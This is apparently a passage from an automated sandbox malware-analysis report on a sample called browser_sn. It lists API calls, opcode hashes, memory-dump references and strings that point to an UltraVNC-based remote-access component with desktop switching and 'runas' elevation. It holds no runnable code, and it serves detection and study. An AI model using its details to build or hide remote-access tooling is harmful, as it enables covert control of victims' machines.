                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF790CEAF59,?,?,00000000,00007FF790CF77FF), ref: 00007FF790CEADC8
                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF790CEAF59,?,?,00000000,00007FF790CF77FF), ref: 00007FF790CEADE6
                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF790CEAF59,?,?,00000000,00007FF790CF77FF), ref: 00007FF790CEAE26
                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF790CEAF59,?,?,00000000,00007FF790CF77FF), ref: 00007FF790CEAE40
                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF790CEAF59,?,?,00000000,00007FF790CF77FF), ref: 00007FF790CEAE50
                                                      • _initterm.LIBCMT ref: 00007FF790CEAE90
                                                      • _initterm.LIBCMT ref: 00007FF790CEAEA3
                                                      • ExitProcess.KERNEL32 ref: 00007FF790CEAEDC
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
                                                      • String ID:
                                                      • API String ID: 3873167975-0
                                                      • Opcode ID: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                      • Instruction ID: 90bccf218f6e00f8edf6f7b271917d62dcd825a2f1bf0a46ef53c5f0732cd294
                                                      • Opcode Fuzzy Hash: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                      • Instruction Fuzzy Hash: 89419121A3DA4285E630BB35E855279F2A4BF89784F841034EA4E437A5EF3CF8548720
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno$_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2819658684-0
                                                      • Opcode ID: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
                                                      • Instruction ID: e34140b512bafa15ea1cf6bbd7c1083c85a9e4e876cc3fd8abeb35b6fc4fbcaa
                                                      • Opcode Fuzzy Hash: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
                                                      • Instruction Fuzzy Hash: C231712592875298EA307B7694211ECF690AF97BA0FD44632EB5C437D5DF2CF500C322
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$FileUnmapView$CriticalDeleteSection
                                                      • String ID:
                                                      • API String ID: 4242051881-0
                                                      • Opcode ID: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                      • Instruction ID: 060fed1668ab7005fe499445b920f7de4e6354b3fe8ba6f7cb0e45dd2fc93f17
                                                      • Opcode Fuzzy Hash: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                      • Instruction Fuzzy Hash: F611BE26A26A0686EF64AF75D954178E3B4FF85F49F841135C90E43364CF2DF485C360
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Desktop$CloseInputOpen
                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 1367241101-3977938048
                                                      • Opcode ID: 872beed9f37bc164325fc22219cfab8ab01e68070e7d89525f2677f35927d260
                                                      • Instruction ID: 02ce5e0098dc16c3e358ca18e8dbea4c64ccde0aeb09dabc6fb6c6924822ea23
                                                      • Opcode Fuzzy Hash: 872beed9f37bc164325fc22219cfab8ab01e68070e7d89525f2677f35927d260
                                                      • Instruction Fuzzy Hash: 98C1C226A2C69185E770AB35C4587FEABA1EF86B48F984131DA4C477E5CF38F481C760
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Desktop$CloseInputOpen
                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 1367241101-3977938048
                                                      • Opcode ID: 47734043b62fd5003f3baede982ab513a6c8474cbed8e2365ac637b1611529ad
                                                      • Instruction ID: f5d1fd5a8d75d364645a885379d46af94fa058dbe92420e635a073e147d75037
                                                      • Opcode Fuzzy Hash: 47734043b62fd5003f3baede982ab513a6c8474cbed8e2365ac637b1611529ad
                                                      • Instruction Fuzzy Hash: CAB1C026A2C69185E770AB35C4587FEBBA1EF86B48F994131DA4C077A5CF38F485C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalDesktopSectionThread$CloseCountCreateEnterInputLeaveOpenResumeRevertSelfTickTimetime
                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 186452611-3977938048
                                                      • Opcode ID: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                      • Instruction ID: 988710bf8dcced244bde4105d2d0b2944e65fe27f201ade2e3f49f6ffa4557dd
                                                      • Opcode Fuzzy Hash: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                      • Instruction Fuzzy Hash: 24A1CF26A2C69185E760EB35C4587FEABA1EF86B48F994031DA4C077A5CF38F485C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno_invalid_parameter_noinfo$AllocGlobalPathTempsprintf
                                                      • String ID: !UVNCDIR-$%s%s%s%s$.zip$\*.*
                                                      • API String ID: 3897446562-3886131270
                                                      • Opcode ID: 2256e7430c5e0a02bc82ce3aebf4d27e46064ed5cf51e837b8b2d61e65df44cc
                                                      • Instruction ID: feeb24c774bf245a42cd9bd55b5676955f4a13ed4661c0d41d5c2749746a0df7
                                                      • Opcode Fuzzy Hash: 2256e7430c5e0a02bc82ce3aebf4d27e46064ed5cf51e837b8b2d61e65df44cc
                                                      • Instruction Fuzzy Hash: 8981C026628B8588EB20DB74D4403FDB761FB427A4F905332EA6D07BD9DF68E546C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$Desktop$CurrentInformationObjectUser
                                                      • String ID: vncservice.cpp : !GetUserObjectInformation $vncservice.cpp : SelectHDESK to %s (%x) from %x$vncservice.cpp : SelectHDESK:!SetThreadDesktop
                                                      • API String ID: 3041254040-2700308907
                                                      • Opcode ID: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
                                                      • Instruction ID: 71694f1283bb16c2cc090ba94170b6a99006ddb5048d489049518bb88a26dd5d
                                                      • Opcode Fuzzy Hash: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
                                                      • Instruction Fuzzy Hash: 5E21FC75A28A8281EA70AB35B9083F6F3A4FF99744FC42032D58E46794EE7CF545C750
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
                                                      • String ID: -delsoftwarecad$p$runas
                                                      • API String ID: 397093096-3343046257
                                                      • Opcode ID: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                      • Instruction ID: 6f731f1cbe730d0aaba5563e187f8d27fb1a3847347b85177efe341b4389384b
                                                      • Opcode Fuzzy Hash: 2d9c0c578c979013a183638fe42de72fccd76df398e534bf6a744ea15e2cbb9d
                                                      • Instruction Fuzzy Hash: 4C11A536529B8186E774AB30F49939AF3B4FB89749F801235D68D02B68DF7CE158CB50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleValueWait
                                                      • String ID:
                                                      • API String ID: 3883107862-0
                                                      • Opcode ID: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
                                                      • Instruction ID: b3adcc3f83964fc8a1547bb53792d02c1a3e6304174ec77a463e114fa926c034
                                                      • Opcode Fuzzy Hash: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
                                                      • Instruction Fuzzy Hash: C6310B36A28B4596EB60EF30E4442A9F3B4FB88B94F842535CA8D43755CF3CE599C710
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
                                                      • String ID:
                                                      • API String ID: 113790786-0
                                                      • Opcode ID: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
                                                      • Instruction ID: 7f4a5d4b90329a7ac4b372dbe4a38d9c466da926bb4af0e1a4b6f2c9e25c666e
                                                      • Opcode Fuzzy Hash: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
                                                      • Instruction Fuzzy Hash: 1D216021E3960286F6757B70A4263B9F2A4AF42780FD45536D64E467D1CF3CF8809772
                                                      APIs
                                                        • Part of subcall function 00007FF790CF37C4: GetLastError.KERNEL32(?,?,?,00007FF790CEFFD1,?,?,?,?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CF37CE
                                                        • Part of subcall function 00007FF790CF37C4: FlsGetValue.KERNEL32(?,?,?,00007FF790CEFFD1,?,?,?,?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CF37DC
                                                        • Part of subcall function 00007FF790CF37C4: FlsSetValue.KERNEL32(?,?,?,00007FF790CEFFD1,?,?,?,?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CF3808
                                                        • Part of subcall function 00007FF790CF37C4: GetCurrentThreadId.KERNEL32 ref: 00007FF790CF381C
                                                        • Part of subcall function 00007FF790CF37C4: SetLastError.KERNEL32(?,?,?,00007FF790CEFFD1,?,?,?,?,00007FF790CE8C19,?,?,?,00007FF790CE748C), ref: 00007FF790CF3834
                                                        • Part of subcall function 00007FF790CF32EC: Sleep.KERNEL32(?,?,?,00007FF790CF37F7,?,?,?,00007FF790CEFFD1,?,?,?,?,00007FF790CE8C19), ref: 00007FF790CF3331
                                                      • _errno.LIBCMT ref: 00007FF790CF9D9C
                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF790CF9DA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastValue$CurrentSleepThread_errno_invalid_parameter_noinfo
                                                      • String ID: ;$;$JanFebMarAprMayJunJulAugSepOctNovDec$gfff
                                                      • API String ID: 1962487656-880385205
                                                      • Opcode ID: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                      • Instruction ID: 37fdd3ad83ee3f99b8135fc5a7b5a5a472fc9664300fe5bde8eff329f27eb478
                                                      • Opcode Fuzzy Hash: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                      • Instruction Fuzzy Hash: 829137336141818FEB299E38C4A57E8BBE1DB62744F58C035DB488B796DA3DF509C722
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
